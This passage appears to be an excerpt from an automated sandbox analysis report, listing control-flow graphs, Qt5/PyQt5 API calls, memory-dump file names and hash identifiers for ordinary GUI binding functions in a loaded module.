5593 7ffb9a2ddad0 5592->5593 5594 7ffb9a2eda50 5595 7ffb9a2eda99 5594->5595 5596 7ffb9a2eda9d ?squareToQuad@QTransform@@SA_NAEBVQPolygonF@@AEAV1@ PyBool_FromLong 5595->5596 5597 7ffb9a2edabb 5595->5597 5598 7ffb9a363a70 5599 7ffb9a363aa6 ?detach@QListData@@QEAAPEAUData@1@H 5598->5599 5600 7ffb9a363a8c 5598->5600 5599->5600 5601 7ffb9a365a70 5602 7ffb9a365adb ??0QTextCursor@@QEAA@AEBV0@ ??0QFont@@QEAA@AEBV0@ 5601->5602 5603 7ffb9a365a98 5601->5603 5605 7ffb9a365b1f ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 5602->5605 5603->5602 5604 7ffb9a365a9c ??0QTextCursor@@QEAA@AEBV0@ ??0QFont@@QEAA@AEBV0@ 5603->5604 5607 7ffb9a365bbc memcpy 5605->5607 5609 7ffb9a365b7f 5605->5609 5608 7ffb9a365bba 5607->5608 5611 7ffb9a365c51 ??0QTextCursor@@QEAA@AEBV0@ ??0QTextCharFormat@@QEAA@AEBV0@ ??1QTextFormat@@QEAA ??1QTextCursor@@QEAA 5608->5611 5612 7ffb9a365c46 5608->5612 5613 7ffb9a365c30 ?deallocate@QArrayData@@SAXPEAU1@_K1 5608->5613 5609->5608 5610 7ffb9a365b90 ??0QTextCursor@@QEAA@AEBV0@ ??0QTextCharFormat@@QEAA@AEBV0@ 5609->5610 5610->5608 5610->5610 5615 7ffb9a36bb90 5612->5615 5613->5611 5616 7ffb9a36bbbe 5615->5616 5617 7ffb9a36bbe7 ?deallocate@QArrayData@@SAXPEAU1@_K1 5615->5617 5618 7ffb9a36bbc3 ??1QTextFormat@@QEAA ??1QTextCursor@@QEAA 5616->5618 5618->5618 5619 7ffb9a36bbe2 5618->5619 5619->5617 5620 7ffb9a329a70 5621 7ffb9a329aa4 5620->5621 5622 7ffb9a329a75 5620->5622 5622->5621 5624 7ffb9a36bc10 5622->5624 5625 7ffb9a36bc52 ?deallocate@QArrayData@@SAXPEAU1@_K1 5624->5625 5626 7ffb9a36bc3d 5624->5626 5627 7ffb9a36bc40 ??1QTextFormat@@QEAA 5626->5627 5627->5625 5627->5627 5628 7ffb9a307a40 5629 7ffb9a307a99 5628->5629 5630 7ffb9a307ac4 5629->5630 5631 7ffb9a307a9d ?setPosition@QWindow@@QEAAXAEBVQPoint@@ 5629->5631 5633 7ffb9a307b29 5630->5633 5634 7ffb9a307b13 ?setPosition@QWindow@@QEAAXHH 5630->5634 5632 7ffb9a307aad 5631->5632 5634->5632 5647 7ffb9a327a80 5648 7ffb9a327ac1 5647->5648 5649 7ffb9a327ae4 5648->5649 5650 7ffb9a327ac5 ?type@QTextFormat@ PyBool_FromLong 5648->5650 5651 7ffb9a2f5a30 5652 7ffb9a2f5a7a 5651->5652 5653 7ffb9a2f5ab0 5652->5653 5654 7ffb9a2f5a7e ?takeVerticalHeaderItem@QStandardItemModel@@QEAAPEAVQStandardItem@@H 5652->5654 5655 7ffb9a2f5aab 5654->5655 5656 7ffb9a2f7a30 5657 7ffb9a2f7a53 5656->5657 5658 7ffb9a2f7b19 5657->5658 5659 7ffb9a2f7afd ?sibling@QStandardItemModel@@UEBA?AVQModelIndex@@HHAEBV2@ 5657->5659 5659->5658 5660 7ffb9a369a90 5661 7ffb9a369ad7 5660->5661 5662 7ffb9a369adf ?drawPolygon@QPaintEngine@@UEAAXPEBVQPointF@@HW4PolygonDrawMode@1@ 5661->5662 5663 7ffb9a369af3 5661->5663 5662->5663 5664 7ffb9a30fa90 5665 7ffb9a30fae6 5664->5665 5666 7ffb9a30fb2c 5665->5666 5667 7ffb9a30faea 5665->5667 5669 7ffb9a30fb71 5666->5669 5672 7ffb9a30fbae 5666->5672 5668 7ffb9a30faf4 ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@HH 5667->5668 5670 7ffb9a30fb26 5668->5670 5671 7ffb9a30fb7b ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@H 5669->5671 5674 7ffb9a30fba8 5671->5674 5673 7ffb9a30fc3c 5672->5673 5675 7ffb9a30fc09 ?cellAt@QTextTable@@QEBA?AVQTextTableCell@@AEBVQTextCursor@@ 5672->5675 5676 7ffb9a30fc36 5675->5676 5677 7ffb9a309a90 5678 7ffb9a309ad2 5677->5678 5679 7ffb9a309af1 5678->5679 5680 7ffb9a309ad6 ?doubleProperty@QTextFormat@@QEBANH PyFloat_FromDouble 5678->5680 5681 7ffb9a313a90 5682 7ffb9a313ada 5681->5682 5683 7ffb9a313ade ?setMiterLimit@QPen@@QEAAXN 5682->5683 5684 7ffb9a313b05 5682->5684 5689 7ffb9a2e1a20 5690 7ffb9a2e1a76 5689->5690 5691 7ffb9a2e1a7a 5690->5691 5695 7ffb9a2e1abc 5690->5695 5692 7ffb9a2e1a84 ?translated@QPolygon@@QEBA?AV1@HH 5691->5692 5694 7ffb9a2e1ab6 5692->5694 5693 7ffb9a2e1b4a 5695->5693 5696 7ffb9a2e1b17 ?translated@QPolygon@@QEBA?AV1@AEBVQPoint@@ 5695->5696 5697 7ffb9a2e1b44 5696->5697 5698 7ffb9a2fda20 5699 7ffb9a2fda6a 5698->5699 5700 7ffb9a2fda6e ??0QVariant@@QEAA@N ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@ ??1QVariant@@QEAA 5699->5700 5701 7ffb9a2fdac5 5699->5701 5702 7ffb9a34fa20 5703 7ffb9a34fa62 5702->5703 5704 7ffb9a34fa7e 5703->5704 5705 7ffb9a34fa66 ?rowCount@QStandardItem@ PyLong_FromLong 5703->5705 5706 7ffb9a31fa20 5707 7ffb9a31fa38 5706->5707 5708 7ffb9a31fa3d 5707->5708 5709 7ffb9a31fa47 ?isEmpty@QRegion@ 5707->5709 5710 7ffb9a323a20 5711 7ffb9a323a7f 5710->5711 5712 7ffb9a323a83 ?setTitle@QPdfWriter@@QEAAXAEBVQString@@ 5711->5712 5714 7ffb9a323ad0 5711->5714 5713 7ffb9a323aba 5712->5713 5715 7ffb9a337a20 5716 7ffb9a337a62 5715->5716 5717 7ffb9a337a7f 5716->5717 5718 7ffb9a337a66 ?showIsFullScreen@QStyleHints@ PyBool_FromLong 5716->5718 5719 7ffb9a2e5a90 5720 7ffb9a2e5aed 5719->5720 5721 7ffb9a2e5b67 _Py_Dealloc 5720->5721 5722 7ffb9a2e5af1 5720->5722 5721->5722 5723 7ffb9a301a90 5724 7ffb9a301ae5 5723->5724 5725 7ffb9a301ae9 ??0QVariant@@QEAA@H ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@ ??1QVariant@@QEAA 5724->5725 5726 7ffb9a301b3e 5724->5726 5727 7ffb9a2ffa90 5728 7ffb9a2ffae5 5727->5728 5729 7ffb9a2ffae9 ?mergeCharFormat@QTextCursor@@QEAAXAEBVQTextCharFormat@@ 5728->5729 5730 7ffb9a2ffb0f 5728->5730 5735 7ffb9a331a30 5736 7ffb9a331a46 5735->5736 5737 7ffb9a331a7d 5736->5737 5738 7ffb9a331a62 ??1QSurfaceFormat@@QEAA 5736->5738 5738->5737 5739 7ffb9a2eba80 5740 7ffb9a2ebac2 5739->5740 5741 7ffb9a2ebafd 5740->5741 5742 7ffb9a2ebad0 ?adjoint@QTransform@@QEBA?AV1 5740->5742 5743 7ffb9a2ebaf8 5742->5743 5744 7ffb9a2f3a80 5745 7ffb9a2f3aca 5744->5745 5746 7ffb9a2f3b0a 5745->5746 5747 7ffb9a2f3ad8 ?findBlockByLineNumber@QTextDocument@@QEBA?AVQTextBlock@@H 5745->5747 5748 7ffb9a2f3b05 5747->5748 5749 7ffb9a2dfa7e ??6@YAAEAVQDataStream@@AEAV0@AEBVQBrush@@ 5750 7ffb9a2dfa03 PyEval_RestoreThread 5749->5750 5751 7ffb9a2dfa29 5750->5751 5752 7ffb9a33da40 5753 7ffb9a33da82 5752->5753 5754 7ffb9a33da86 ?textWidth@QStaticText@ PyFloat_FromDouble 5753->5754 5755 7ffb9a33da9c 5753->5755 5761 7ffb9a303a70 5762 7ffb9a303ab2 5761->5762 5763 7ffb9a303ab6 ?currentList@QTextCursor@@QEBAPEAVQTextList@ 5762->5763 5764 7ffb9a303ae0 5762->5764 5765 7ffb9a303adb 5763->5765 5771 7ffb9a2dba66 ??5@YAAEAVQDataStream@@AEAV0@AEAVQPicture@@

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocPainterPath@@V0@@malloc
                                                                                                                                                                                                                • String ID: J9J9
                                                                                                                                                                                                                • API String ID: 3358426265-2881787613
                                                                                                                                                                                                                • Opcode ID: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
                                                                                                                                                                                                                • Instruction ID: 5ef42111d5763dc8072309fd4d222189f6f35bc5c4f576979ed2d51309708df5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 397f20297a745331685ad4fe260f2d81337722706534342931fde31b935acf1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E216DB2B0CA4582EB90CF66E84426933A9FB88B80F554175DE5D43764DF3CD440CB10

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ??0QPainter@@QEAA@PEAVQPaintDevice@@@Z.QT5GUI ref: 00007FFB9A35B593
                                                                                                                                                                                                                  • Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Device@@@PaintPainter@@malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 45773141-0
                                                                                                                                                                                                                • Opcode ID: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                • Instruction ID: b3cc4adae67abc3848d517469e98aa7bb252d98bf30df802465fe8e2f003321f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82bc66c56b52707f45d0deaa57a676eb05b34faaac532d0dbf26db8a7b54cf3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28212C72A0CB8181EB648B26F44026A77A9FB89BC4F544175EE8D53B68DF3CD151C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_$Dealloc$Clear$ArrayData@@Iter_LongNextOccurred$?deallocate@?sharedFlagsFormatIterLong_MaskNull@Object_Type_U1@_Unsigned
                                                                                                                                                                                                                • String ID: index %zd has type '%s' but 'int' is expected
                                                                                                                                                                                                                • API String ID: 1054522911-1902674334
                                                                                                                                                                                                                • Opcode ID: 3024be0910b915447839cbb89722b36bf52f6cf41eaf4212b7a12349fda54e3d
                                                                                                                                                                                                                • Instruction ID: ed3818aad83352c877adc535a4f05c4f7c37b2eec0345135a830cec140e919d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3024be0910b915447839cbb89722b36bf52f6cf41eaf4212b7a12349fda54e3d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E5151B2A0DA2282EB75AF76E94417873A8BF86FA5F1440B1DE0E12790DE7CE4459700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 60 7ffb9a335980-7ffb9a3359cd 62 7ffb9a3359cf-7ffb9a3359e2 call 7ffb9a3f9d18 ??0QPalette@@QEAA@XZ 60->62 63 7ffb9a3359e7-7ffb9a335a40 60->63 67 7ffb9a33603a-7ffb9a336051 62->67 68 7ffb9a335a42-7ffb9a335a64 call 7ffb9a3f9d18 ??0QPalette@@QEAA@AEBVQColor@@@Z 63->68 69 7ffb9a335a69-7ffb9a335aaa 63->69 75 7ffb9a335b75-7ffb9a335b8d 68->75 73 7ffb9a335aac-7ffb9a335ac2 call 7ffb9a3f9d18 ??0QPalette@@QEAA@W4GlobalColor@Qt@@@Z 69->73 74 7ffb9a335ac7-7ffb9a335b30 69->74 80 7ffb9a336032 73->80 81 7ffb9a335b92-7ffb9a335ceb 74->81 82 7ffb9a335b32-7ffb9a335b71 call 7ffb9a3f9d18 ??0QPalette@@QEAA@AEBVQColor@@0@Z 74->82 75->80 80->67 86 7ffb9a335cf1-7ffb9a335e4b call 7ffb9a3f9d18 ??0QPalette@@QEAA@AEBVQBrush@@00000000@Z 81->86 87 7ffb9a335e50-7ffb9a335e91 81->87 82->75 86->80 92 7ffb9a335eaf-7ffb9a335f06 87->92 93 7ffb9a335e93-7ffb9a335eaa call 7ffb9a3f9d18 ??0QPalette@@QEAA@AEBV0@@Z 87->93 99 7ffb9a335f0c-7ffb9a335f1d ?canConvert@QVariant@@QEBA_NH@Z 92->99 100 7ffb9a336030 92->100 93->80 101 7ffb9a335f23-7ffb9a335f40 call 7ffb9a3f9d18 ?userType@QVariant@@QEBAHXZ 99->101 102 7ffb9a335fc4-7ffb9a335ffd 99->102 100->80 107 7ffb9a335f42-7ffb9a335f57 ?constData@QVariant@@QEBAPEBXXZ ??0QPalette@@QEAA@AEBV0@@Z 101->107 108 7ffb9a335f59-7ffb9a335f77 ??0QPalette@@QEAA@XZ ?convert@QVariant@@QEBA_NHPEAX@Z 101->108 114 7ffb9a335fff-7ffb9a336002 102->114 115 7ffb9a336004-7ffb9a336007 102->115 110 7ffb9a335f9f-7ffb9a335fc2 107->110 111 7ffb9a335f8c-7ffb9a335f8f ??0QPalette@@QEAA@XZ 108->111 112 7ffb9a335f79-7ffb9a335f8a 108->112 110->80 116 7ffb9a335f95-7ffb9a335f99 ??1QPalette@@QEAA@XZ 111->116 112->116 114->80 118 7ffb9a33601d-7ffb9a336027 115->118 119 7ffb9a336009-7ffb9a33600f 115->119 116->110 118->100 119->118 121 7ffb9a336011-7ffb9a336015 119->121 121->118 123 7ffb9a336017 _Py_Dealloc 121->123 123->118
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Palette@@$Color@@@malloc
                                                                                                                                                                                                                • String ID: @J1$J1J1$J1J1J1J1J1J1J1J1J1
                                                                                                                                                                                                                • API String ID: 3764790817-546078739
                                                                                                                                                                                                                • Opcode ID: 7b79cfe6f1c65334bfec613ac97aaa070dd01f58f2062c5257fc66d6e28e45dd
                                                                                                                                                                                                                • Instruction ID: 78141a02eb40b58bb26126f25fa763133f10253ff7f5f04963c4ba25688bf98f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b79cfe6f1c65334bfec613ac97aaa070dd01f58f2062c5257fc66d6e28e45dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B212CB76B18B9189EB608F61E8442AD77B8FB89B98F50417ADE8E53B58DF3CD054C700

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 127 7ffb9a2e1b80-7ffb9a2e1baf PyObject_GetIter 128 7ffb9a2e1c03-7ffb9a2e1c1e 127->128 129 7ffb9a2e1bb1-7ffb9a2e1bba PyErr_Clear 127->129 132 7ffb9a2e1c24-7ffb9a2e1c59 call 7ffb9a3f9d18 PyErr_Clear PyIter_Next 128->132 133 7ffb9a2e1e35 128->133 130 7ffb9a2e1bf1-7ffb9a2e1c02 129->130 131 7ffb9a2e1bbc-7ffb9a2e1bc1 129->131 134 7ffb9a2e1bc3-7ffb9a2e1bc6 _Py_Dealloc 131->134 135 7ffb9a2e1bcc-7ffb9a2e1bda PyType_GetFlags 131->135 141 7ffb9a2e1de5-7ffb9a2e1dee PyErr_Occurred 132->141 142 7ffb9a2e1c5f 132->142 137 7ffb9a2e1e38 133->137 134->135 135->130 138 7ffb9a2e1bdc-7ffb9a2e1bf0 135->138 140 7ffb9a2e1e3a-7ffb9a2e1e57 137->140 143 7ffb9a2e1df4-7ffb9a2e1dfb 141->143 144 7ffb9a2e1edf-7ffb9a2e1ee4 141->144 145 7ffb9a2e1c60-7ffb9a2e1c8f 142->145 146 7ffb9a2e1e0d-7ffb9a2e1e13 call 7ffb9a368760 143->146 147 7ffb9a2e1dfd-7ffb9a2e1e00 143->147 148 7ffb9a2e1ee6-7ffb9a2e1ee9 _Py_Dealloc 144->148 149 7ffb9a2e1eef-7ffb9a2e1f0a 144->149 156 7ffb9a2e1e58-7ffb9a2e1e8a PyErr_Format 145->156 157 7ffb9a2e1c95-7ffb9a2e1c9d 145->157 150 7ffb9a2e1e18-7ffb9a2e1e2a call 7ffb9a3f9d54 146->150 147->150 151 7ffb9a2e1e02-7ffb9a2e1e0b 147->151 148->149 149->140 150->133 163 7ffb9a2e1e2c-7ffb9a2e1e2f _Py_Dealloc 150->163 151->146 151->150 166 7ffb9a2e1e95-7ffb9a2e1e9c 156->166 167 7ffb9a2e1e8c-7ffb9a2e1e8f _Py_Dealloc 156->167 158 7ffb9a2e1ca3-7ffb9a2e1d2c ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH@Z call 7ffb9a36de20 * 2 157->158 159 7ffb9a2e1d7d-7ffb9a2e1d8f ?append@QListData@@QEAAPEAPEAXXZ call 7ffb9a36dd50 157->159 179 7ffb9a2e1d40-7ffb9a2e1d46 call 7ffb9a368760 158->179 180 7ffb9a2e1d2e-7ffb9a2e1d31 158->180 168 7ffb9a2e1d94-7ffb9a2e1db4 159->168 163->133 170 7ffb9a2e1eae-7ffb9a2e1eb4 call 7ffb9a368760 166->170 171 7ffb9a2e1e9e-7ffb9a2e1ea1 166->171 167->166 177 7ffb9a2e1db6-7ffb9a2e1db9 _Py_Dealloc 168->177 178 7ffb9a2e1dbf-7ffb9a2e1ddf PyErr_Clear PyIter_Next 168->178 174 7ffb9a2e1eb9-7ffb9a2e1ecb call 7ffb9a3f9d54 170->174 171->174 175 7ffb9a2e1ea3-7ffb9a2e1eac 171->175 174->137 187 7ffb9a2e1ed1-7ffb9a2e1eda _Py_Dealloc 174->187 175->170 175->174 177->178 178->141 178->145 183 7ffb9a2e1d4b-7ffb9a2e1d7b call 7ffb9a36dd50 179->183 182 7ffb9a2e1d33-7ffb9a2e1d3e 180->182 180->183 182->179 182->183 183->168 187->137
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • index %zd has type '%s' but 'QInputMethodEvent::Attribute' is expected, xrefs: 00007FFB9A2E1E70
                                                                                                                                                                                                                Memory Dump Source
